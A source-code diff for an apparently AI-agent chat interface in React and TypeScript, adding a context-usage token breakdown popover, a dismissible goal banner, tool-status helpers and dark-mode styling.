+const CONTEXT_USAGE_FIXED_SEGMENT_KEY_SET = new Set<ContextUsageBreakdownSegment['key']>( // Same keys, for O(1) membership checks.
+  CONTEXT_USAGE_FIXED_SEGMENT_KEYS,
+);
+/** Sums the estimated token cost of every part in `message`. */
+function estimateMessageTokens(message: Message): number {
+  return message.parts.map((part) => estimatePartTokens(part)).reduce((total, cost) => total + cost, 0);
+}
+/**
+ * Estimates the active context purely from the locally loaded messages.
+ *
+ * Messages flagged `compacted` are skipped. Tokens from `reasoning` and
+ * `thinking` parts go to the reasoning bucket; every other part goes to the
+ * conversation bucket. A bucket only yields a segment when it is non-zero.
+ * The input array and its messages are only read, never modified.
+ *
+ * @param messages Messages to scan.
+ * @returns Conversation/reasoning segments (in that order) and their summed `usedTokens`.
+ */
+function estimateActiveMessageBreakdown(messages: Message[]): Pick<ContextUsageBreakdown, 'segments' | 'usedTokens'> {
+  const totals = { conversation: 0, reasoning: 0 };
+
+  for (const message of messages) {
+    // Compacted messages are left out of the active estimate.
+    if (message.compacted) continue;
+    for (const part of message.parts) {
+      const isReasoning = part.type === 'reasoning' || part.type === 'thinking';
+      totals[isReasoning ? 'reasoning' : 'conversation'] += estimatePartTokens(part);
+    }
+  }
+
+  // Fixed order keeps conversation ahead of reasoning in the output.
+  const bucketOrder = ['conversation', 'reasoning'] as const;
+  const segments: ContextUsageBreakdownSegment[] = bucketOrder
+    .filter((bucket) => totals[bucket] > 0)
+    .map((bucket) => ({
+      key: bucket,
+      tokens: totals[bucket],
+      colorClass: CONTEXT_SEGMENT_COLORS[bucket],
+      included: true,
+    }));
+
+  return {
+    usedTokens: totals.conversation + totals.reasoning,
+    segments,
+  };
+}
+
+/** Maps a server segment onto a known key (`otherContext` is treated as `conversation`); returns null for unknown keys. */
+function normalizeContextSegment(segment: {
+  key: string;
+  tokens: number;
+  included?: boolean;
+}): ContextUsageBreakdownSegment | null {
+  const aliasedKey = segment.key === 'otherContext' ? 'conversation' : segment.key;
+  if (!CONTEXT_SEGMENT_KEYS.has(aliasedKey)) return null;
+  const key = aliasedKey as ContextUsageBreakdownSegment['key'];
+  // Missing or NaN counts become 0; fractional counts are rounded and negatives clamped to 0.
+  const tokens = Math.max(0, Math.round(segment.tokens || 0));
+  return {
+    key,
+    tokens,
+    colorClass: CONTEXT_SEGMENT_COLORS[key],
+    included: segment.included !== false,
+  };
+}
+/** Adds `tokens` to the segment with `key`, mutating `segments` in place; appends a new included segment when none exists. */
+function addContextSegmentTokens(
+  segments: ContextUsageBreakdownSegment[],
+  key: ContextUsageBreakdownSegment['key'],
+  tokens: number,
+): void {
+  // Zero or negative amounts are ignored, so this never creates an empty segment.
+  if (tokens <= 0) return;
+
+  const index = segments.findIndex((candidate) => candidate.key === key);
+  if (index === -1) {
+    const colorClass = CONTEXT_SEGMENT_COLORS[key];
+    segments.push({ key, tokens, colorClass, included: true });
+    return;
+  }
+
+  // Only the first segment with a matching key is updated.
+  segments[index].tokens += tokens;
+}
+/**
+ * Produces exactly one included row per fixed usage key, in display order.
+ * Input segments with other keys are dropped, duplicates are summed, and
+ * keys with no input get a zero-token placeholder. The first segment seen
+ * for a key is copied, so the caller's objects are never modified.
+ */
+function normalizeFixedContextSegments(
+  segments: ContextUsageBreakdownSegment[],
+): ContextUsageBreakdownSegment[] {
+  const merged = new Map<ContextUsageBreakdownSegment['key'], ContextUsageBreakdownSegment>();
+
+  segments
+    .filter(({ key }) => CONTEXT_USAGE_FIXED_SEGMENT_KEY_SET.has(key))
+    .forEach((segment) => {
+      const seen = merged.get(segment.key);
+      if (!seen) {
+        // Copy on first sight so later accumulation only touches our own object.
+        merged.set(segment.key, { ...segment, included: true });
+        return;
+      }
+      seen.tokens += segment.tokens;
+    });
+
+  return CONTEXT_USAGE_FIXED_SEGMENT_KEYS.map((key) => merged.get(key) ?? {
+    key,
+    tokens: 0,
+    colorClass: CONTEXT_SEGMENT_COLORS[key],
+    included: true,
+  });
+}
+/** Builds the usage breakdown from the server `snapshot` when one is given, otherwise from a local estimate of `messages`; `draft` tokens count as conversation. */
+export function buildContextUsageBreakdown(
+  messages: Message[],
+  draft: string,
+  snapshot?: ContextUsageSnapshot | null,
+): ContextUsageBreakdown {
+  const compactedTokens = messages.reduce((total, message) => (
+    message.compacted ? total + estimateMessageTokens(message) : total
   ), 0);
-  return messageTokens + countTokensLikeCompaction(draft);
+  const draftTokens = countTokensLikeCompaction(draft);
+  // Snapshot path: use the server's numbers and only layer the current draft on top.
+  if (snapshot) {
+    const serverSegments = (snapshot.segments || [])
+      .map(normalizeContextSegment)
+      .filter((segment): segment is ContextUsageBreakdownSegment => Boolean(segment)); // drops segments with unknown keys
+    const segments = [...serverSegments];
+    // The draft is charged to the conversation row.
+    addContextSegmentTokens(segments, 'conversation', draftTokens);
+
+    return {
+      usedTokens: Math.max(0, snapshot.usedTokens || 0) + draftTokens,
+      compactedTokens: Math.max(0, snapshot.compactedTokens || 0), // server value; the local estimate above is not used here
+      segments: normalizeFixedContextSegments(segments),
+      excludedSegments: [], // snapshot.excludedSegments is not carried over
+    };
+  }
+  // Local fallback: no snapshot, so estimate everything from the loaded messages.
+  const activeBreakdown = estimateActiveMessageBreakdown(messages);
+  const segments: ContextUsageBreakdownSegment[] = [...activeBreakdown.segments];
+
+  addContextSegmentTokens(segments, 'conversation', draftTokens);
+
+  return {
+    usedTokens: activeBreakdown.usedTokens + draftTokens,
+    compactedTokens,
+    segments: normalizeFixedContextSegments(segments),
+    excludedSegments: [],
+  };
 }
 
 function formatTokenCount(tokens: number): string {
@@ -244,9 +482,44 @@ function formatTokenCount(tokens: number): string {
   return String(tokens);
 }
 
-function ContextUsageRing({ percent, title }: { percent: number; title: string }) {
+/** Display label for a context-usage segment: the translation when one exists, otherwise a built-in English label. */
+function getContextUsageLabel(t: ReturnType<typeof useTranslation>['t'], key: ContextUsageBreakdownSegment['key']): string {
+  const translationKey = `chat.contextUsage.breakdown.${key}`;
+  const translated = t(translationKey);
+  // t() handing the key back unchanged is treated as "no translation available".
+  if (translated !== translationKey) return translated;
+  const englishLabels: Record<ContextUsageBreakdownSegment['key'], string> = {
+    systemPrompt: 'System prompt',
+    toolDefinitions: 'Tool definitions',
+    tools: 'Tool calls',
+    skillLoad: 'Skill loads',
+    agentDelegation: 'Agent delegation',
+    conversation: 'Conversation',
+    reasoning: 'Reasoning',
+    draft: 'Current draft',
+    compactedHistory: 'Compacted history',
+  };
+  return englishLabels[key];
+}
+
+function ContextUsageRing({
+  percent,
+  title,
+  usedTokens,
+  totalTokens,
+  breakdown,
+}: {
+  percent: number;
+  title: string;
+  usedTokens: number;
+  totalTokens: number;
+  breakdown: ContextUsageBreakdown;
+}) {
+  const { t } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const wrapperRef = useRef<HTMLDivElement>(null);
   const clamped = Math.max(0, Math.min(100, percent));
-  const radius = 13;
+  const radius = 9;
   const circumference = 2 * Math.PI * radius;
   const strokeDashoffset = circumference * (1 - clamped / 100);
   const strokeClass = clamped >= 90
@@ -256,27 +529,124 @@ function ContextUsageRing({ percent, title }: { percent: number; title: string }
       : clamped >= 50
         ? 'stroke-sky-500'
         : 'stroke-zinc-400';
+  const rows = breakdown.segments;
+  const activeSegments = breakdown.segments.filter((segment) => segment.tokens > 0);
+
+  useEffect(() => {
+    if (!open) return undefined;
+
+    const handlePointerDown = (event: MouseEvent) => {
+      if (!wrapperRef.current?.contains(event.target as Node)) {
+        setOpen(false);
+      }
+    };
+    const handleKeyDown = (event: KeyboardEvent) => {
+      if (event.key === 'Escape') {
+        setOpen(false);
+      }
+    };
+
+    document.addEventListener('mousedown', handlePointerDown);
+    document.addEventListener('keydown', handleKeyDown);
+    return () => {
+      document.removeEventListener('mousedown', handlePointerDown);
+      document.removeEventListener('keydown', handleKeyDown);
+    };
+  }, [open]);
 
   return (
     <div
-      className="relative inline-flex h-8 w-8 shrink-0 items-center justify-center rounded-full"
-      title={title}
-      aria-label={title}
+      ref={wrapperRef}
+      className="relative inline-flex h-6 w-6 shrink-0 items-center justify-center"
     >
-      <svg className="absolute inset-0 h-8 w-8 -rotate-90" viewBox="0 0 32 32" aria-hidden="true">
-        <circle cx="16" cy="16" r={radius} fill="none" strokeWidth="2.5" className="stroke-zinc-200" />
-        <circle
-          cx="16"
-          cy="16"
-          r={radius}
-          fill="none"
-          strokeWidth="2.5"
-          strokeLinecap="round"
-          className={strokeClass}
-          strokeDasharray={circumference}
-          strokeDashoffset={strokeDashoffset}
-        />
-      </svg>
+      <button
+        type="button"
+        className="relative inline-flex h-6 w-6 items-center justify-center rounded-full transition-colors hover:bg-zinc-200/60 focus-visible:outline focus-visible:outline-2 focus-visible:outline-offset-2 focus-visible:outline-sky-500"
+        title={title}
+        aria-label={title}
+        aria-haspopup="menu"
+        aria-expanded={open}
+        onClick={() => setOpen((value) => !value)}
+      >
+        <svg className="absolute inset-0 h-6 w-6 -rotate-90" viewBox="0 0 24 24" aria-hidden="true">
+          <circle cx="12" cy="12" r={radius} fill="none" strokeWidth="2" className="stroke-zinc-200 dark:stroke-zinc-800" />
+          <circle
+            cx="12"
+            cy="12"
+            r={radius}
+            fill="none"
+            strokeWidth="2"
+            strokeLinecap="round"
+            className={strokeClass}
+            strokeDasharray={circumference}
+            strokeDashoffset={strokeDashoffset}
+          />
+        </svg>
+      </button>
+
+      {open && (
+        <div
+          role="menu"
+          aria-label={t('chat.contextUsage.title')}
+          className="absolute bottom-full right-0 z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white text-zinc-800 shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200 dark:shadow-xl dark:shadow-black/30"
+        >
+          <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="flex items-center justify-between gap-3">
+              <div className="min-w-0">
+                <div className="truncate text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('chat.contextUsage.title')}</div>
+                <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">
+                  {t('chat.contextUsage.tokens', {
+                    used: formatTokenCount(usedTokens),
+                    total: formatTokenCount(totalTokens),
+                  })}
+                </div>
+              </div>
+              <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[10px] font-medium text-zinc-500 dark:bg-zinc-800 dark:text-zinc-300">
+                {t('chat.contextUsage.full', { percent: clamped })}
+              </span>
+            </div>
+            <div className="mt-1.5 h-1 overflow-hidden rounded-full bg-zinc-100 dark:bg-zinc-800">
+              <div
+                className="flex h-full overflow-hidden rounded-full"
+                style={{ width: `${clamped}%` }}
+              >
+                {activeSegments.map((segment) => (
+                  <div
+                    key={segment.key}
+                    className={segment.colorClass}
+                    style={{
+                      flex: '0 0 auto',
+                      width: `${Math.min(100, (segment.tokens / Math.max(1, usedTokens)) * 100)}%`,
+                    }}
+                  />
+                ))}
+              </div>
+            </div>
+          </div>
+
+          <div className="max-h-[13.5rem] space-y-0.5 overflow-y-auto p-1.5">
+            {rows.map((segment) => (
+              <div
+                key={segment.key}
+                role="menuitem"
+                className="flex min-w-0 items-center justify-between gap-3 rounded-md px-2 py-1.5 text-xs text-zinc-700 dark:text-zinc-300"
+              >
+                <div className="flex min-w-0 items-center gap-2">
+                  <span className={`h-3 w-3 shrink-0 rounded-[3px] ${segment.colorClass}`} />
+                  <span className="truncate font-medium text-zinc-800 dark:text-zinc-100">
+                    {getContextUsageLabel(t, segment.key)}
+                  </span>
+                </div>
+                <span className={segment.included ? 'shrink-0 text-zinc-600 dark:text-zinc-300' : 'shrink-0 text-zinc-400 dark:text-zinc-500'}>
+                  {segment.included
+                    ? formatTokenCount(segment.tokens)
+                    : t('chat.contextUsage.excludedTokens', { tokens: formatTokenCount(segment.tokens) })}
+                </span>
+              </div>
+            ))}
+          </div>
+        </div>
+      )}
     </div>
   );
 }
@@ -459,10 +829,14 @@ export function getMessageBubbleClassName({
   isEditing: boolean;
 }): string {
   if (compact) {
-    return `max-w-[90%] px-4 py-3 rounded-[20px] text-sm break-words shadow-sm ${
+    const widthClass = isUser
+      ? (isEditing ? 'w-full max-w-full' : 'max-w-full')
+      : 'w-full max-w-full';
+
+    return `${widthClass} px-4 py-3 rounded-[20px] text-sm break-words shadow-sm ${
       isUser
-        ? 'bg-sky-50 border border-sky-100 text-zinc-900'
-        : 'bg-white border border-zinc-200/90'
+        ? 'bg-sky-50 border border-sky-100 text-zinc-900 dark:border-zinc-700 dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-none'
+        : 'bg-white border border-zinc-200/90 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-100 dark:shadow-none'
     }`;
   }
 
@@ -472,11 +846,15 @@ export function getMessageBubbleClassName({
 
   return `${widthClass} px-5 py-4 rounded-[24px] text-sm break-words shadow-sm ${
     isUser
-      ? 'bg-sky-50 border border-sky-100 text-zinc-900'
-      : 'bg-white border border-zinc-200/90'
+      ? 'bg-sky-50 border border-sky-100 text-zinc-900 dark:border-zinc-700 dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-none'
+      : 'bg-white border border-zinc-200/90 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-100 dark:shadow-none'
   }`;
 }
 
+export function getInstructionDisplayBubbleClassName(compact: boolean): string {
+  return [compact ? 'px-2.5 py-1.5' : 'px-3 py-2', 'rounded-lg border border-rose-100 bg-rose-50/80 text-sm text-rose-700 shadow-none dark:border-rose-500/30 dark:bg-rose-950/30 dark:text-rose-200'].join(' '); // density-specific padding, then the shared rose styling
+}
+
 export function getMessageGroupClassName({
   compact,
   isUser,
@@ -487,14 +865,19 @@ export function getMessageGroupClassName({
   isEditing: boolean;
 }): string {
   if (!isUser) {
-    return compact ? 'max-w-[90%]' : 'w-full';
+    return compact ? 'w-full max-w-full' : 'w-full';
   }
 
   if (compact) {
     return isEditing ? 'w-full max-w-[90%]' : 'w-fit max-w-[90%]';
   }
 
-  return isEditing ? 'w-[80%] max-w-[80%]' : 'w-fit max-w-[80%]';
+  return isEditing ? 'w-full max-w-full' : 'w-fit max-w-[88%]';
+}
+
+export function getCompactionDividerClassName(compact: boolean): string {
+  const [verticalMargin, leftInset] = compact ? ['my-3', 'pl-[38px]'] : ['my-4', 'pl-[42px]']; // both spacings depend on density
+  return `${verticalMargin} flex w-full min-w-0 items-center gap-3 ${leftInset} pr-1 text-xs text-zinc-500`;
 }
 
 export function getRegenerateTruncateTarget(
@@ -518,6 +901,21 @@ export function shouldRefetchFinishedMessage({
   return !finishedMessageId || !abortedMessageId || finishedMessageId !== abortedMessageId;
 }
 
+/** True when `part` is a 'tool' or 'toolCall' part whose state status is 'pending' or 'running'. */
+export function isActiveToolPart(part?: Pick<MessagePart, 'type' | 'state'> | null): boolean {
+  if (part?.type !== 'tool' && part?.type !== 'toolCall') return false;
+  const status = part.state?.status;
+  return status === 'pending' || status === 'running';
+}
+
+export function hasActiveToolPart(parts?: Array<Pick<MessagePart, 'type' | 'state'>> | null): boolean {
+  return parts ? parts.some((part) => isActiveToolPart(part)) : false; // a missing list has no active tool part
+}
+
+export function isActiveSessionStatus(status?: { type?: string } | null): boolean {
+  return ['busy', 'compacting', 'retry'].includes(status?.type ?? ''); // a missing status or type is never active
+}
+
 export function getEditingActionBarClassName(): string {
   return 'mt-3 flex w-full items-center justify-end gap-1.5';
 }
@@ -533,7 +931,12 @@ export function getRenderableFileUrl(url: string): string {
 
   try {
     const parsed = new URL(url);
-    const path = decodeURIComponent(parsed.pathname);
+    let path = decodeURIComponent(parsed.pathname);
+    if (/^\/[A-Za-z]:\//.test(path)) {
+      path = path.slice(1);
+    } else if (parsed.hostname) {
+      path = `//${parsed.hostname}${path}`;
+    }
     return `${getApiBase()}/api/file/download?path=${encodeURIComponent(path)}`;
   } catch {
     return url;
@@ -549,17 +952,46 @@ export function shouldRenderMessage(message: Pick<Message, 'role' | 'parts' | 'f
   ) {
     return false;
   }
+  if (
+    message.role === 'assistant' &&
+    message.finish === 'stop' &&
+    !message.error &&
+    message.parts?.length &&
+    message.parts.every((part) => {
+      if (part.type === 'text') return !(part.text || '').trim();
+      if (part.type === 'reasoning' || part.type === 'thinking') return !getRenderableThinkingText(part);
+      return false;
+    })
+  ) {
+    return false;
+  }
   return true;
 }
 
+/** Picks the most specific human-readable text from a message's error; '' when the message has no error. */
+export function getMessageErrorText(message: Pick<Message, 'error'>): string {
+  const failure = message.error as any;
+  if (!failure) return '';
+  if (typeof failure === 'string') return failure;
+  const candidates: unknown[] = [ // listed in order of preference
+    failure.data?.displayMessage,
+    failure.message,
+    failure.data?.message,
+    failure.code,
+    failure.name,
+  ];
+  const firstText = candidates.find((value) => typeof value === 'string' && value.trim());
+  return typeof firstText === 'string' ? firstText : 'Message failed';
+}
+
 export function getUserAvatarContainerClassName(compact: boolean): string {
-  return `pointer-events-none absolute left-full top-0 ml-2.5 translate-y-1/2 flex items-center justify-end ${
+  return `pointer-events-none flex flex-shrink-0 items-start justify-center pt-1 ${
     compact ? 'h-7' : 'h-8'
   }`;
 }
 
-export function getUserAvatarSpacerClassName(compact: boolean): string {
-  return compact ? 'h-3.5' : 'h-4';
+export function getUserAvatarSpacerClassName(_compact: boolean): string {
+  return 'h-0'; // Always zero height; `_compact` is accepted but not used.
 }
 
 function areToolStatesRenderEqual(
@@ -659,10 +1091,137 @@ function isAllowedUploadFile(file: File): boolean {
 }
 
 function getQueuedPromptText(item: QueuedPrompt): string {
+  if (typeof item.displayText === 'string' && item.displayText) return item.displayText; // non-empty display text wins over the parts
+  if (typeof item.display_text === 'string' && item.display_text) return item.display_text; // presumably the snake_case form of the same field; confirm against the API payload
   const textPart = item.parts.find((part) => part.type === 'text' && typeof part.text === 'string');
   return typeof textPart?.text === 'string' ? textPart.text : '';
 }
 
+function getGoalBannerKey(goal: GoalBannerState | null): string {
+  return !goal ? '' : `${goal.status}:${goal.objective}`; // "<status>:<objective>", or '' when there is no goal
+}
+
+function getDismissedGoalStorageKey(sessionId?: string | null): string | null {
+  return (sessionId && `flocks:session:${sessionId}:dismissedGoal`) || null; // no session id means no storage key
+}
+
+/** Returns the dismissed-goal key saved for `sessionId`, or '' when there is none or storage cannot be read. */
+function readDismissedGoalKey(sessionId?: string | null): string {
+  const key = getDismissedGoalStorageKey(sessionId);
+  let stored: string | null = null;
+  if (key && typeof window !== 'undefined') {
+    try { stored = window.localStorage.getItem(key); } catch { /* a failed read counts as nothing saved */ }
+  }
+  return stored || '';
+}
+
+/** Saves `goalKey` as the dismissed goal for `sessionId`; an empty `goalKey` removes the saved entry instead. */
+function writeDismissedGoalKey(sessionId: string | null | undefined, goalKey: string): void {
+  const key = getDismissedGoalStorageKey(sessionId);
+  if (typeof window === 'undefined' || !key) return;
+  try {
+    const storage = window.localStorage;
+    if (!goalKey) {
+      storage.removeItem(key);
+      return;
+    }
+    storage.setItem(key, goalKey);
+  } catch { /* Ignore unavailable storage; dismissal still works for the current mount. */ }
+}
+
+/** Maps a session goal to banner state; null unless the objective is non-blank and the status is one of the four listed values. */
+function toGoalBannerState(goal: SessionGoalState | null | undefined): GoalBannerState | null {
+  const textOrUndefined = (value: unknown): string | undefined => (typeof value === 'string' ? value : undefined);
+  const objective = (textOrUndefined(goal?.objective) ?? '').trim();
+  const status = textOrUndefined(goal?.status) ?? '';
+  if (objective === '' || !['active', 'completed', 'blocked', 'paused'].includes(status)) return null;
+  return {
+    objective,
+    status: status as GoalBannerStatus,
+    reason: textOrUndefined(goal?.reason),
+  };
+}
+
+/**
+ * Status label for the goal banner: the translation when one exists, otherwise a built-in English label.
+ */
+function getGoalStatusLabel(t: ReturnType<typeof useTranslation>['t'], status: GoalBannerStatus): string {
+  const translationKey = `chat.goal.status.${status}`;
+  const translated = t(translationKey);
+  // t() handing the key back unchanged is treated as "no translation available".
+  if (translated !== translationKey) return translated;
+  const englishLabels: Record<GoalBannerStatus, string> = { active: 'Goal', completed: 'Completed', blocked: 'Blocked', paused: 'Paused' };
+  return englishLabels[status];
+}
+
+/**
+ * Tailwind classes (banner root, status dot) plus the icon element for a goal banner.
+ * 'completed', 'blocked' and 'paused' each have their own palette; any other status gets the sky one.
+ */
+function getGoalBannerTone(status: GoalBannerStatus): { root: string; dot: string; icon: React.ReactNode } {
+  switch (status) {
+    case 'completed':
+      return {
+        root: 'border-emerald-200 bg-emerald-50 text-emerald-900',
+        dot: 'bg-emerald-500',
+        icon: <CheckCircle2 className="h-3.5 w-3.5 text-emerald-600" />,
+      };
+    case 'blocked':
+      return {
+        root: 'border-red-200 bg-red-50 text-red-900',
+        dot: 'bg-red-500',
+        icon: <AlertCircle className="h-3.5 w-3.5 text-red-600" />,
+      };
+    case 'paused':
+      return {
+        root: 'border-amber-200 bg-amber-50 text-amber-900',
+        dot: 'bg-amber-500',
+        icon: <Clock className="h-3.5 w-3.5 text-amber-600" />,
+      };
+    default:
+      return {
+        root: 'border-sky-200 bg-sky-50 text-sky-950',
+        dot: 'bg-sky-500',
+        icon: <ListTree className="h-3.5 w-3.5 text-sky-600" />,
+      };
+  }
+}
+
+/**
+ * One-row goal banner: status dot, icon, status label, objective, optional reason and a dismiss button.
+ */
+function GoalBanner({ goal, t, onDismiss }: {
+  goal: GoalBannerState;
+  t: ReturnType<typeof useTranslation>['t'];
+  onDismiss: () => void;
+}) {
+  const { root, dot, icon } = getGoalBannerTone(goal.status);
+  // A reason is rendered only for goals that are not 'active' (and stays hidden below the sm breakpoint).
+  const visibleReason = goal.status !== 'active' ? goal.reason : undefined;
+  return (
+    <div className={`mb-2 flex min-w-0 items-center gap-2 rounded-lg border px-3 py-2 text-xs shadow-sm ${root}`}>
+      <span className={`h-1.5 w-1.5 shrink-0 rounded-full ${dot}`} />
+      <span className="shrink-0">{icon}</span>
+      <span className="shrink-0 font-semibold">{getGoalStatusLabel(t, goal.status)}</span>
+      <span className="min-w-0 flex-1 truncate font-medium">{goal.objective}</span>
+      {visibleReason && (
+        <span className="hidden min-w-0 max-w-[35%] truncate text-[11px] opacity-70 sm:inline">
+          {visibleReason}
+        </span>
+      )}
+      <button
+        type="button"
+        onClick={onDismiss}
+        title={t('chat.goal.dismiss')}
+        aria-label={t('chat.goal.dismiss')}
+        className="ml-1 inline-flex h-6 w-6 shrink-0 items-center justify-center rounded-md text-current opacity-60 transition hover:bg-black/5 hover:opacity-100"
+      >
+        <X className="h-3.5 w-3.5" />
+      </button>
+    </div>
+  );
+}
+
 interface QueuedPromptPanelProps {
   items: QueuedPrompt[];
   expanded: boolean;
@@ -697,34 +1256,41 @@ function QueuedPromptPanel({
   if (items.length === 0) return null;
 
   return (
-    <div className="mb-2 rounded-xl border border-zinc-200 bg-zinc-950/[0.02] overflow-hidden">
+    <div className="mb-2 overflow-hidden rounded-xl border border-zinc-200 bg-zinc-950/[0.02] dark:border-zinc-800 dark:bg-zinc-900/60">
       <button
         type="button"
         onClick={onToggle}
-        className="flex w-full items-center gap-2 px-3 py-2 text-left text-xs font-medium text-zinc-600 hover:bg-zinc-100/70 transition-colors"
+        className="flex w-full items-center gap-2 px-3 py-2 text-left text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-100/70 dark:text-zinc-300 dark:hover:bg-zinc-800"
       >
         <ChevronDown className={`h-3.5 w-3.5 transition-transform ${expanded ? '' : '-rotate-90'}`} />
         <span>{t('chat.queue.count', { count: items.length })}</span>
       </button>
       {expanded && (
-        <div className="max-h-40 overflow-y-auto border-t border-zinc-200">
+        <div className="max-h-40 overflow-y-auto border-t border-zinc-200 dark:border-zinc-800">
           {items.map((item) => {
             const isEditing = editingId === item.id;
             const isBusy = actionId === item.id || item.status === 'executing';
             const text = getQueuedPromptText(item);
+            const instructionLabel = parseInstructionDisplayText(text);
             return (
-              <div key={item.id} className="flex items-start gap-2 px-3 py-2 border-b border-zinc-100 last:border-b-0">
-                <div className="mt-1 h-2 w-2 rounded-full border border-zinc-400 flex-shrink-0" />
+              <div key={item.id} className="flex items-start gap-2 border-b border-zinc-100 px-3 py-2 last:border-b-0 dark:border-zinc-800">
+                <div className="mt-1 h-2 w-2 flex-shrink-0 rounded-full border border-zinc-400 dark:border-zinc-500" />
                 <div className="min-w-0 flex-1">
                   {isEditing ? (
                     <textarea
                       value={editingText}
                       onChange={(event) => onEditChange(event.target.value)}
-                      className="w-full resize-none rounded-lg border border-zinc-200 bg-white px-2 py-1.5 text-xs text-zinc-800 outline-none focus:border-zinc-300 focus:ring-2 focus:ring-zinc-100"
+                      className="w-full resize-none rounded-lg border border-zinc-200 bg-white px-2 py-1.5 text-xs text-zinc-800 outline-none focus:border-zinc-300 focus:ring-2 focus:ring-zinc-100 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-100 dark:focus:border-zinc-700 dark:focus:ring-zinc-800/70"
                       rows={2}
                     />
                   ) : (
-                    <div className="line-clamp-2 text-xs text-zinc-700">{text || t('chat.queue.attachmentOnly')}</div>
+                    instructionLabel ? (
+                      <span className="inline-flex max-w-full items-center truncate rounded-md border border-rose-100 bg-rose-50 px-2 py-1 text-xs font-semibold leading-none text-rose-700 dark:border-rose-500/30 dark:bg-rose-950/30 dark:text-rose-200">
+                        {instructionLabel}
+                      </span>
+                    ) : (
+                      <div className="line-clamp-2 text-xs text-zinc-700 dark:text-zinc-300">{text || t('chat.queue.attachmentOnly')}</div>
+                    )
                   )}
                 </div>
                 <div className="flex flex-shrink-0 items-center gap-1">
@@ -734,7 +1300,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onEditSave(item)}
                         disabled={isBusy || !editingText.trim()}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.save')}
                       >
                         <Save className="h-3.5 w-3.5" />
@@ -743,7 +1309,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={onEditCancel}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.cancel')}
                       >
                         <X className="h-3.5 w-3.5" />
@@ -755,7 +1321,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onEditStart(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.queue.edit')}
                       >
                         <Pencil className="h-3.5 w-3.5" />
@@ -764,7 +1330,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onRunNow(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.queue.runNow')}
                       >
                         <ArrowUp className="h-3.5 w-3.5" />
@@ -773,7 +1339,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onRemove(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-red-50 hover:text-red-600 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-red-50 hover:text-red-600 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-red-950/40 dark:hover:text-red-300"
                         title={t('chat.queue.remove')}
                       >
                         <Trash2 className="h-3.5 w-3.5" />
@@ -856,6 +1422,8 @@ export default function SessionChat({
   const fullWidth = display?.fullWidth ?? false;
   const showActions = display?.showActions ?? false;
   const showTimestamp = display?.showTimestamp ?? false;
+  const collapseIntermediateSteps = display?.collapseIntermediateSteps ?? false;
+  const processGroupsDefaultOpen = display?.processGroupsDefaultOpen ?? false;
   const effectiveComposerTextareaMinHeight = composerTextareaMinHeight ?? 24;
   const effectiveComposerTextareaMaxHeight = composerTextareaMaxHeight ?? (compact ? 96 : 200);
   const effectivePlaceholder = placeholder ?? t('chat.placeholder');
@@ -866,6 +1434,7 @@ export default function SessionChat({
   const [input, setInput] = useState<string>(() => readChatDraft(sessionId));
   const [sending, setSending] = useState(false);
   const [isStreaming, setIsStreaming] = useState(false);
+  const activeToolPartIdsRef = useRef<Set<string>>(new Set());
   const [attachments, setAttachments] = useState<ComposerAttachment[]>([]);
   const [isDragOver, setIsDragOver] = useState(false);
   // Lightbox preview for composer thumbnails. Shares the same overlay
@@ -874,6 +1443,8 @@ export default function SessionChat({
   const [composerPreview, setComposerPreview] = useState<{ url: string; alt?: string } | null>(null);
   const [isCompacting, setIsCompacting] = useState(false);
   const [compactingMessage, setCompactingMessage] = useState('');
+  const [goalBanner, setGoalBanner] = useState<GoalBannerState | null>(null);
+  const [dismissedGoalKey, setDismissedGoalKey] = useState(() => readDismissedGoalKey(sessionId));
   const [queuedPrompts, setQueuedPrompts] = useState<QueuedPrompt[]>([]);
   const [queueExpanded, setQueueExpanded] = useState(true);
   const [editingQueueId, setEditingQueueId] = useState<string | null>(null);
@@ -938,12 +1509,19 @@ export default function SessionChat({
   const [editingRole, setEditingRole] = useState<Message['role'] | null>(null);
   const [editingText, setEditingText] = useState('');
